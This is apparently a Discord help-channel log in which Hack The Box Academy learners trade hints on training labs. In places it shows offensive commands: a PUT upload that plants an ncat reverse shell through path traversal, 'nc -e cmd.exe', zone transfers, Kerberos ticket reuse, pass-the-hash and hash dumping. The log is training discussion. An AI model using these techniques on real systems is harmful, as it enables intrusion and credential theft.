i tried steghide but which doesn't support PNG format.. i try and convert the image to JPG and then used stegcracker.. i still couldn't find the passpharse

vital adder
#

if you need to brute force the password try stegseek it can go through rockyou in a few sec

summer lava
#

@vital adder , i used stegcracker it went through rockyou for almost 12 hours and didn't find anything

spare condor
#

I don't know...I can only see the AES-256 Hash....Is this the way it should work? Can anyone tell me?

vital adder
#

stegseek should take a few sec with rockyou (the whole thing) and if you still can't get it then the right password just isn't in rockyou

summer lava
#

@vital adder i tried it.. but while most of the tools doesn't support PNG format

#

the tool was so fast though, went through rockyou in not less than 30 second

vital adder
#

oh shoot i forgot about the png thing and yep that tool is fast

summer lava
#

would the hidden information on PNG be tampered after been converted to JPG

vital adder
#

not sure but i think so also did you try with tool like exiftool or binwalk with the file?

stuck hull
placid quest
#

@stuck hull yes

gloomy tangle
gloomy tangle
graceful rampart
frigid monolith
gloomy tangle
frigid monolith
#

Connection refused, no matter what ip I use

#

It's started, it's listening on 0.0.0.0:22

#

I added my public key to authorized

gloomy tangle
#

damn difficult to help blindly hehe will start the module this weekend. best of luck

frigid monolith
#

Worked yesterday but I couldn't log into neo4j lol

#

Thanks

floral sandal
#

guys I am having issues with rdp into windows machines, currently I am studying Active directory attacks & enumeration
When i connect using rdp from my attack box, it disconnect after 3sec or more, any suggestions ?

runic walrus
#

Module: Firewall and IDS/IPS Evasion - Medium Lab
Prompt: After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
I found the flag, but I cannot figure out how it wants it formatted for the answer

#

HTB984NIFN97CB0783QBNJCPAS984UIN

#

That is what I got

uncut cave
#

has anyone had issue with getting back the cubes reward ? I have finished the LDAP module but didn't get 200 cubes back

runic walrus
#

Is there a way to copy the flag from the vm incase of typos?

runic walrus
# ripe badge Try to wrap the {} around

Still cannot get it with: HTB{984NIFN97CB0783QBNJCPAS984UIN}
I've tried every format I can think of. This is the service version correct? I found it where it says: Service Info: Host: HTB984NIFN97CB0783QBNJCPAS984UIN; OS: Linux; CPE: ..........

sly tapir
#

The best hint is the one it gives you

runic walrus
polar crag
#

Attacking Common Services Easy - Trying to get my Webshell but i cant get it to work tried uploading different shells but whenever i curl it or open the link in the browser nothing happens and nothing connects back to my listener
tried this command|| curl -k -X PUT -H "Host: 10.129.80.115" --basic -u fiona:987654321 --data-binary "ncat 10.10.15.91 1234 -e" --path-as-is https://10.129.80.115/../../../../../..\xampp\htdocs\myshell.php||

#

any hints?

#

sitting almost 5h on this one lol

runic walrus
sly tapir
#

this hint: ||publicly accessible server|| helped me

runic walrus
placid quest
#

@polar crag use the database to upload the shell

polar crag
#

jesus

#

finaly

#

got it but im still not sure how haha

rustic sage
#

Hey, is solving boxes by reading a write up a day before doing so a good enough learning path? I can't seem to solve any on my own but I also don't want to be mindlessly copying and pasting as I read and write

lethal schooner
#

Does anyone have the kira password in Credential Hunting in Linux module? I didn't keep her password from the previous ones.

#

Unless I'm missing something from the hint

placid quest
#

@rustic sage that is not good idea, u need to try first

rustic sage
placid quest
#

@rustic sage try harder and think out of the box

polar crag
#

alright now i could replicate it! finaly free this took me ages lmao and it was only easy

#

@rustic sage yes i agree with crean... try it first and if you stuck look up for hints, then try harder, repeat.
If you really dont know how to solve them then get the basics down

#

check out the modules youre weak at

tawdry geyser
#

I Know this is the wrong sub but, Im unsure where to go for an annoying email account assiciation issue with my THM account lol

tawdry geyser
graceful rampart
#

Check your dms

tawdry geyser
#

tyvm

viscid furnace
#

Could someone help me with:

  • The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system.
  • Module: Metasploit - Sessions - last Question
  • I am getting a low priv user shell - and I configured the payload to use 'x64' architecture but when I try the other module payload - the CVE one - It says - exploited but no sessions were created, and the current session is also the low priv user.
  • I have read the previous chats and I think @hazy grotto faced the same issue - so if you or anyone else have figured it out, Could you please help me, Thanks
placid quest
#

@viscid furnace Look for sudo bufferoverflow

warm dagger
#

1st post here... I'm on Meterpreter module. I have a session as NT Authority\System, i've dumped the hashes and trying to submit the htb-student ntlm hash, it's not taking it as correct. I've converted to all CAPS, submitted as presented, etc... any suggestions?

viscid furnace
ripe badge
graceful rampart
ripe badge
warm dagger
#

@ripe badge that's the part i took; however, it's the same for all users

graceful rampart
forest shoal
#

Anyone have a hint for the NoSQL Injection module. I am stuck on the last assessment and can't seem to come up with a payload to return true/false

graceful rampart
#

they arent stored NT:LM theyre stored LM:NT

ripe badge
warm dagger
# graceful rampart they arent stored NT:LM theyre stored LM:NT

so, i tried just running hashdump, but i had to bg the session, and use the post exploit. I've tried entering all parts of the hash, LOL. got this error with hashdump: priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. so - i'm about to go to google university

ripe badge
graceful rampart
warm dagger
graceful rampart
#

np

devout torrent
#

I have a bit of a noob question, I am doing the Windows Fundamentals module and I need to remote to the windows machine with xfreerdp, I enter the information, I press enter. It tells me if I accept the certification, I click Y.
And after that the machine does not spawn

#

What am I doing wrong ? 😦

graceful rampart
#

Send a screenshot if the error

rustic sage
#

I'm also having the same problem with host 3, I have a shell but don't have privilege to type the flag. Does anyone have any hints?

devout torrent
fathom pendant
rustic sage
#

Disregard, found the solution to my problem.

lethal cargo
#

Please ,is it preferable to use a virtual box on a windows machine or simply run Kali linux on a USB?

autumn pilot
#

virtual box

timid spruce
#

hlo

lethal cargo
#

Okay thanks

#

Does anyone here know how to change windows Mac address

graceful rampart
fathom pendant
tiny ember
#

For the Footprinting module -> DNS section the final question is What is the FQDN of the host where the last octet ends with "x.x.x.203"? I'm assuming i should || use the subdomain list to discover more subdomains via the bash one liner, but its not returning me a domain with the expected IP address. Is this the right path or should i be down another path? ||

rustic sage
#

guys is it weird i prefer pwnin shit on htb instead of hanging out with my fam?

dim hound
rustic sage
dim hound
#

Thanks, I will ! @rustic sage

#

I love this Rule; OneRuleToRuleThemAll.rule

#

Works for far a lot of times haha

rustic sage
#

I think they provided a rule list to

#

for your sanity I’d stick to what’s in the resources sections or you’re going to be waiting a lot longer

dim hound
#

ahw sure, thanks!

frigid monolith
rustic sage
#

ha nice just what i needed to hear glad to be among my people haha @frigid monolith

forest shoal
#

I got the NoSQL Injection module anyways

hazy grotto
#

Woah. Checked out the general chat today. Just about got canceled.

I'm so thankful for the people in here.

gleaming spindle
#

Hi I'm with a doubt in the module Information Gathering - Web Edition section Active Subdomain Enumeration question: Identify how many zones exist on the target nameserver. Submit the number of found zones as the answer. I have managed to perform what I believe were n-number of zone transfers with nslookup (I couldn't with dig, I can't understand how to pass the parameters to make it work). I don't know if i'm understanding correctly the question, is asking how many parts (making a simplification, understanding parts (zones) as containing each the respective registers of FQDN's and ip's ) of this organization can I reach? If any one can give light on this I will really appreciate it

gleaming spindle
hazy grotto
#

Whoops i was looking in OSINT

#

I maybe have guessed the answer. i can't even remember how this even works.

#

dig axfr inlanefreight.htb @<IP>

rustic sage
#

lol i am dying at what the guy who wrote documentation and reporting said: "We've tried to make this typically dull topic more engaging than usual, so strap in. It's going to be a wild ride down the rabbit hole of documentation and reporting!"

fathom pendant
#

Lolll

hazy grotto
#

Damn it sucks being dense

rustic sage
#

hey anyone done the documenting and reporting final lab. could use some help

#

Hello I'm working on the sessions section of the introduction to metasploit module. I'm on the last question which indicates sudo is outdated, I have attempted to background the session and use local exploit suggester, and other small tasks but to no avail. Can someone give me a hint?

#

I have the sudo version, just unsure how I should go about escalating my privilege.

#

I have found the solution, disregard.

rustic sage
#

hey if you've done documenting/reporting skill assersment i could use help machine keeps resetting after a min or two making it impossible to complete. have switched vpn's, tried via pwnbox, tried 5 different target ip's nothing works i know what to do but can't do it so if any of yall could help please DM me

fathom pendant
#

ugh the last question on DNS is killing me; not sure what I'm doing wrong per se in regards to getting the answer any help is appreciated; I did the loop command but now I'm not sure where to really go from that... I feel like it should be obvious but I'm just not seeing it

#

Footprinting DNS

#

OH MY GOD

#

I figured... it was

#

lol i'm so silly on that one

karmic mantle
#

In the final capstone module, does anyone have issues doing ssh dynamic port forwarding on the initial access machine?

#

For CPTS

fresh reef
#

Stuck on Password Attacks Medium, I've got the smb creds, j's ssh/sql creds, d's creds including the crack rsa ...but still at a lost when it comes to priv esc to root @.@ and avoided asking for help up until the "Just drop linPeas " feeling washed over me and i valiantly resisted lol #plshlp

fathom pendant
#

I mean... nothing wrong with using tools; they're there to help.. get the answer easy then work backwards on how the automated script got the results

lapis brook
#

Currently on "Introduction to Networking" and I'm having a hard time grasping the concept of subnetting.. if anybody could chime in and help a homie out, that would be very much appreciated! Mahalo (thank you) \mn/

fathom pendant
thorn urchin
#

the assessments for Attacking Common Applications are pretty brutal compared to super easy mode module sections

#

I found a semi-unintended way to finish the final part though by reading the docs lmao

fresh reef
lapis brook
candid zephyr
#

The first 27 bits remain the same. Only the remaining are variables.

fathom pendant
fathom pendant
#

the 0 numbers represent the available ips that can be assigned on a network :)

#

it might be asking you to write out the full command to make the directory

#

you're on the right track

#

:)

#

with linux when you mkdir it drops it as whatever you typed

#

the only time you may need quotes is if you're using spaces

#

eh having spaces in a directory just means whenever you reference the full filepath you need to have the quote around the entire path

fathom pendant
#

if you're going to separate words for directory/filenaming; i suggest using the '_' or '-'

#

you'll end up hating yourself so trying to help you break the habit, because you may end up fudging up a command because the filepath referenced, needs quotes, and you forgot a quote, also if you have an open ended quote when finishing out a command it goes to the next line waiting for you to close that quote.

vital adder
grim maple
#

hey can someone help me with something

#

i am not able to sign up in htb academy

#

its is saying u have to verify email

#

can someone tell me how to solve this

grand tartan
#

Log into the email account you typed in to Hack the box academy

#

And it will send you a link, when u click the link ur account will be verified

fathom pendant
#

Hey @vital adder you still around? I wanna dm you something bc I'm getting an interesting error but not sure what the cause is, but my basic error is "failed to read user names database"

#

Nvm I figured it out I think

#

Error resolved

#

New issue... But eh

vital adder
#

i'm here also which module are you having that issue with?

fathom pendant
#

the footprinting smtp module; I got it to stop yelling at me about the wordlist, but now I'm running into the fact that it's not finding any accounts

#

i probably could have manually enum faster than this lol

#

but gahd dangit bobby i wanna be cool

#

... i swear to god

#

one second

#

because I SWEAR

#

if i have been fighting this... for NO reason

spiral creek
#

yo i lost my phone

#

can someone help me trace it

fathom pendant
#

Damn bro that's rough

vital adder
#

for the smtp thing i just use metasploit the first time because i can't get the tool to work but someone here found out the issue was it was going to fast 🤣

#

so try with -w 15 at the end

fathom pendant
#

i've been trying to run every iteration of this stupid command LOL

fathom pendant
vital adder
#

i think yes but i didn't have to use it in for the command in my note

placid quest
#

@fathom pendant use evolution to login smtp

fathom pendant
fathom pendant
vital adder
#

sorry for the off topic post just want to put this here to linked it to other people asking about oscp

placid quest
#

@vital adder I think in the upgraded oscp bufferoverflow was removed

vital adder
#

oh wait really?

#

i just take this screenshot

fathom pendant
#

i got the name

#

btw

#

but i'm just like why this hate

vital adder
#

for oscp?

#

it's 2k

fathom pendant
#

i meant the name for the lesson

#

msfconsole ftw

placid quest
#

@fathom pendant u will need username, password and email to login

fathom pendant
#

sounds like a lot of effort

vital adder
#

also did you use the given wordlist?

fathom pendant
#

yes

vital adder
#

if the smtp-user-enum tool don't work for you try smtp_enum in metasploit

#

but for the tool 2 main tag is ||-M VRFY|| for the smtp method and ||-w 15|| for the speed

fathom pendant
#

ye metasploit/msfconsole got my back Ghost_Laugh

vital adder
#

yep that also got my most of the time other tool don't work

fathom pendant
#

the speed one wasn't necessary though i loaded the actual aux

#

just had to change directories and stuff

#

Restarted my computer for the first time since I did the reset let's hope I don't have to do another one LOL

worldly pagoda
#

Any pointers on how to find admin email address? (FootPrinting -> IMAP / POP3)

#

imaps ssl interaction shows ssl cert email address (cto) but that's invalid

#

tried a few dns enum options on dev subdomain, but no luck

#

also checked robin's mailbox...no emails there 😦

slow wind
#

Hey kinda stuck asking this here due to lacking access to the rest of the server but you're all very helpful so I thought it wouldn't be a big deal

#

is there any difference between a integer and buffer overflow

#

after doing some light reading it seems like integer overflows lead to bufferflows and are practically the same thing if you dont get into to much detail

dim hound
#

I have the following error with Evil-winRM, I tried to google. But I am not able to solve this issue. Has anyone an idea?

#

I have the same error, when I try to use evil-winrm (installed via gem)

#

I tried to install older versions of evil-winrm.. but that didn't work

vital adder
vital adder
# dim hound

if you are in the pth section of the password attack module then this should work

#

just for a sanity check try scanning winrm port on that target machine

dim hound
#

Yea.. the winrm port is open. I think there is something wrong with my machine

vital adder
#

try restart the target machine wait a few min for everything to fully booted up

rustic sage
#

In Attacking Enterpise / Active Directory Compromise, the following command to add ttimons to the Server Admins group fails and i don't understand why. Any idea?

#

PS C:\Users\ilfserveradm\Downloads> $group = Convert-NameToSid "Server Admins"
PS C:\Users\ilfserveradm\Downloads> Add-DomainGroupMember -Identity $group -Members 'ttimmons' -Credential $timcreds -verbose

#

i get this error "Add-DomainGroupMember : Cannot bind argument to parameter 'Identity' because it is an empty string."

acoustic owl
summer lava
#

Any idea on how to read .zlib binary compressed file ?

rustic sage
acoustic owl
#

Otherwise, I can't see anything that could be wrong.

dry parrot
#

Hi

#

quick question

#

in the Mass IDOR Enumeration
section

#

im adding the ?uid=1 after /documents.php

#

but im not seeing any results

#

is that normal?

devout cliff
#

can i dm someone about a question in the SMB portion of the Footprinting module? Nevermind got it

dim hound
dry parrot
#

thanks

tiny ember
#

okay still struggling with the Footprint module -> DNS ||I'm curious why the dnsenum script can't find the ns.internal.inlanefreight.htb name server given its there||

#

Feels like the answer lies somewhere in
||;; ANSWER SECTION:
dev.inlanefreight.htb. 604800 IN SOA inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
dev.inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.||

#

||and i tried brute forcing that but still never got an entry even with 11mil sub domain wordlist||

acoustic owl
broken warren
#

Can someone explain where I'm going wrong in file inclusion module > file prevention question 2. We are supposed to use the php.ini file (there are two) and edit them to block system () commands. But if you cat the path to the php.ini file and use grep system. There is no option for it, so I assume we must enter that whole thing in, but where? And in theory if I try doing a pho webshell that uses system() shouldnt it work, because mine hasn't. Any help would be appreciated +UPDATE+ somehow I big boy brained it and figured it out somehow, I would be glad to help anyone struggling with this in the future.

candid zephyr
hazy grotto
lethal schooner
#

Did anyone have issues getting a reverseshell using julio's hash? Password Attacks - Pass the hash

lethal schooner
#

I ended up using nc -e cmd.exe instead. The generated powershell code from revshell didn't work.

rustic sage
#

Looking for some assistance with Credential Hunting in Linux section. I can log in with kira password.. However having trouble locating Will's password. I've poked around and attempted multiple firefox decrypt and utilize LaZagne with no luck.. Can I get a hint in the right direction..

still edge
#

Hi guys , I wanted to know if you got any material ( youtube or video) of people actually doing EH .

thorn urchin
dim hound
#

I am doing the following module https://academy.hackthebox.com/module/147/section/1657, I am at the following question; Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio. . I found the right kerberos file, I can interact with DC01. I reverted the instance 2 times but the julio.txt isn't there. Can I dm someone?

#

Only flag.txt is present (from earlier queston), there is no julio.txt

lethal schooner
#

@rustic sage Trying running the firefox decrypt script from the module.

trail leaf
#

Was working through the SSH Dynamic Port Forwarding + SOCKS stuff on Pivoting. How does one get rid of these socket error messages when doing an nmap scan over proxychains?

placid quest
#

@trail leaf maybe use 0>&1 at the end

trail leaf
#

nope, didn't work

#

2>/dev/null did though

placid quest
#

Ok

pastel ginkgo
#

What does the Capital S mean? I know a lowercase means you can execute something with the permissions of another user. or is this an error in the module?

hazy grotto
#

Use the user's credentials we found in the previous section and find out the credentials for MySQL. Submit the credentials as the answer. (Format: <username>:<password>)

#

Password Attacks - Password Reuse

#

Been working on this for 4 hours and can't seem to figure out what to do.

warm sand
#

Hello folks, anyone available to get me some help with the RDP and SOCKS Tunneling with SocksOverRDP module -- I did exactly what was instructed but kept getting an error when connecting over RDP with the user jason. is there a workaround on this or a hint to finish the module would be awesome! Thank you.

fathom pendant
#

@placid quest I now see what you meant by using evolution: Thanks for the hint; it was self explanatory once it clicked :D

proper inlet
uneven rock
#

Hey I apologize if this is the wrong section for this. I’m new to discord and new to cybersecurity/ pen testing; I’ve been doing a few paths/ modules and had a silly question; is the “bash” terminal called “mate” in the workstation? I was stumped on the introduction for a stupid long time; restarted and had to subscribe to start a new instance but I planned to anyway

fathom pendant
#

sometimes you have to be slightly more specific, and sometimes capitalization matters :)

thorn urchin
lethal schooner
#

@hazy grotto Check the github repo for default passwords, the link is in the module.

rustic sage
#

anyone here done skill assess for sql injection fundamentals? pretty far but could use some help

lethal schooner
#

Am I doing this wrong? In password attacks, I'm looking for the julio.txt flag and it's empty?
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 00:50:40 2022

fathom pendant
#

you've cat and looked at it yeah?

#

usually the answer is within the module as well

lethal schooner
#

@fathom pendant smbclient //dc01/julio -k -c "more julio.txt"

#

That's what I ran to read it.

fathom pendant
#

not on that one yet - are you able to actually access the server share to take a look?

lethal schooner
#

@fathom pendant
smb: \SharedFolder> cd julio
smb: \SharedFolder\julio> ls
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 0 Sun Dec 25 01:03:44 2022

            7706623 blocks of size 4096. 4459931 blocks available
fathom pendant
#

if only there was a way to retrieve a file this way ¯_(ツ)_/¯

hazy grotto
lethal schooner
hazy grotto
#

Ah never mind I found it

#

Thanks

lethal schooner
#

@fathom pendant must be an error in lab. I can read linux01's flag but not julio's on the same share.

fathom pendant
#

¯_(ツ)_/¯

lethal schooner
#

@dim hound I think it's an error in the lab

Ticket cache: FILE:/tmp/krb5cc_647401106_XXXXXX
Default principal: julio@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
12/25/2022 01:10:02  12/25/2022 11:10:02  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 12/26/2022 01:10:02
12/25/2022 01:10:59  12/25/2022 11:10:02  cifs/dc01@INLANEFREIGHT.HTB
root@linux01:/tmp# smbclient //dc01/julio -k
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 14 12:25:24 2022
  ..                                  D        0  Thu Jul 14 12:25:24 2022
  julio.txt                           A        0  Sun Dec 25 01:03:44 2022

                7706623 blocks of size 4096. 4459477 blocks available
graceful rampart
#

Anyone ever get this error with hydra before? Im at a loss for how to fix it

lethal schooner
#

@graceful rampart try ftp

graceful rampart
lethal schooner
#

I'm pretty sure it is, did you nmap scan. I used ftp instead of ssh.

#

I was running into the same errors. It timesout too much

graceful rampart
eternal vale
#

Network Enumeration with Nmap - Service enumeration module - Nmap service scan runs fine on all ports but am not seeing anything that looks like a flag.

lethal schooner
#

@eternal vale what flags did you use?

eternal vale
#

nmap -sV -p- 10.129.2.49 -T5

fathom pendant
eternal vale
#

oh ok, let me remove that

lethal schooner
#

@eternal vale maybe try finding an nmap script to use

#

starts with a 'b' I think

eternal vale
#

ok, didn't realize how deep it went since no scripts have been mentioned thus far

fathom pendant
eternal vale
#

will poke around

#

oh really?

lethal schooner
#

I think -sC runs defaults scripts, is that not mentioned yet?

fathom pendant
#

what is the specific question being asked?

eternal vale
#

I did -A as well and didn't see any flag like but let me try again

fathom pendant
#

also if you just see the version as a text and not the HTB{...} flag you may need to refresh your vpn connection

eternal vale
#

Just not seeing a flag after running service scans

fathom pendant
#

DM me what you're having issues with and your scans

eternal vale
#

And wasn't sure how deep it went or if I just missed it

#

ok thanks!

fathom pendant
#

because if this is the one I think it is then the answer may be simple

broken warren
#

Does anyone have good notes or guidance for the skill assessment in file inclusion module?

graceful rampart
lethal schooner
#

@graceful rampart Took about 30mins for me

graceful rampart
#

Ripp. Why make an excersize take so long lmao

#

whats the point

lethal schooner
#

The password attacks module is rough

wheat garden
lethal schooner
#

Not so what the point is. Maybe illustrate what a real pentest it like idk..

#

I think it's pointless

graceful rampart
#

I agree. I understand not having it be the first password int he list but making it take 30 minutes is brutal for an excesize

wheat garden
#

speed things up alot

lethal schooner
#

I recall they didn't even tell you to try another service

#

ssh took longer, and error'd out more. FeelsWeirdMan

#

@graceful rampart Try ncrack if you want to brute force ssh. Hydra didn't really work for me in the lab.

graceful rampart
#

Will do

#

Apparently its a known issue that im having

#

theres an open issueon the giuthub that hasnt been fixed yet

wheat garden
#

tip - { sed '1,17000d' mut_password.list > cut_mut_password.list }

rustic sage
#

hey guys i an new in this server

graceful rampart
pale veldt
#

hello any there personn to help me

red obsidianBOT
#

There is no need to use a VPN to connect for any of the CA Challenges, they are all accessible via the public IP's given when started. Not all challenges have an HTTP server however, some you need to connect via nc.

turbid lily
#

I know a couple of months have passed, but this is definitely the definition of think out of the box. It helped a lot. Thank you!

dim hound
meager topaz
#

someone tell me how to scan when nmap -sX and -Pn scan block

fathom pendant
rustic sage
#

Happy holidays fellow nerds

rustic sage
#

Ensure you're using "starting point VPN" for starting point machines

#

Or "machines" for normal/retired machines

wintry gorge
#

Can anyone help on the Active directory skill assessment part 1?

vast geyser
#

HI,Could everyone tell me why SQLMAP can't detect JSON data as below:

pastel gale
#

anyone online

placid quest
#

@pastel gale yes

pastel gale
placid quest
#

No

vital adder
vital adder
vital adder
vast geyser
vital adder
#

the -p is for selecting the parameter to inject

simple barn
#

Hello everyone I'm doing cpts at the moment and came across one exercise under public exploits section. I'm not able to scan the server both using VPN and pwnbox. nmap -sV --script=banner <IP> -p <PORT> for service enumeration. The message I get from nmap is " Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-25 07:16 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.35 seconds " Can someone please help me why this is happening? I've also switched to different vpns but the same result.

knotty galleon
#

is it possible to intercept radio transmissions

pastel ginkgo
#

Yes, but thats not related to HTB see other platforms.

pastel ginkgo
dim hound
#

Who can I dm, regarding Paswords Attack, hard lab?

simple barn
#

@pastel ginkgo I already did those but still not responding even from the pwnbox. Unable to ping it

fathom pendant
simple barn
#

Yes I did

woeful ermine
#

On Password Attacks-Credential Hunting in Windows. I am trying to upload lazagne.exe.
I tried with xfreerdp and I am constantly disconnected or getting this error.
Any ideas or workaround to upload a file.

broken warren
simple barn
#

@broken warren yes that's what I've been trying

pastel ginkgo
#

If you cant ping the target period you have other problems before running nmap

#

all of the targets on HTB are pingable

vital adder
#

you can't ping / scan htb docker container and you only have access to that ip with the given port

vital adder
pastel ginkgo
#

ooo I didnt even think of that

#

Most of the nmap modules dont use dockers

vital adder
#

it's more like all of them don't use docker container

#

scanning through public ip mean you are routing traffic through your ISP and that isn't fun

woeful ermine
# dim hound smb server ; )

└─$ smbclient -U Bob -L 10.129.225.69
Password for [WORKGROUP\Bob]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC

Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.225.69 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
I also cant access admin and c shares

dim hound
#

Inside there, it's explained how you can utilize smb server to upload files.

woeful ermine
#

it says on the section. We can use our RDP client to copy the file over to the target from our attack host. If we are using xfreerdp all we must do is copy and paste into the RDP session we have established.

#

hahaha

#

What I think is there is a problem with the machine or sth

dim hound
#

reset the machine 😀

woeful ermine
#

yeah. I ve alredy done that like 4-5 times

#

hahaha

dim hound
#

shittt.. then idk dude

candid zephyr
vital adder
#

yeah i have 0 clue but that seem to happened a bit too much lately

rustic sage
#

Anyone got a quick way to put zips into the PWNBOX? i haven't run into this issue since i usually VM but...Yeah...

#

I don't think i can just copy it in.

vital adder
#

if the zip file in your case if a download for a section you can just copy that link and use wget on the pwnbox

rustic sage
#

yeah just thought i could also just log in on HTB on the PWNBOX...

vital adder
#

or if that isn't the case for me i just do a python simplehttpserver with ngrok (i use the samething if i need to move file from the pwnbox to my machine)

rustic sage
#

maybe i should sleep ahaha ^^;;;;

#

really liking hashcat though

#

best module so far

rustic sage
#

Sorry to bother again and I know it's the python2 version: But how do i actually do this question? I've reinstalled JohnTheRipper stuff from github and it still doesn't want to work

#

Has anyone got an answer to how I can get this working?

vital adder
rustic sage
#

I'll erratum it, do i need to VM it?

vital adder
#

i'm not 100% sure but i think i did found a "fix" a while back let me see if i can find it but you should just use your own vm for this or use some online stuff

rustic sage
#

Rog, thanks

#

Such a shame, because it's been a really solid lesson until now

mint thorn
#

Hi guys i am new to this. I wanna learn hacking and my basics are covered like networking, nmap, wireshark. I wanna learn pentesting but i am confused, under which subscription plan it falls. Can you help me ?

vital adder
#

Introductory video on getting into hacking and cybersecurity.

▶ Play video

Sponsor: https://go.intigriti.com/thecybermentor
Blog Post: https://tcm-sec.com/so-you-want-to-be-a-hacker-2022-edition/
Academy: https://academy.tcm-sec.com

Timestamps:
0:00 - Introduction
0:53 - Intigriti Sponsorship
1:55 - Building a Foundation
2:10 - Important Notes
5:37 - Basic IT Skills
8:28 - Networking Skills
12:38 - Linux Skills
17:04 ...

▶ Play video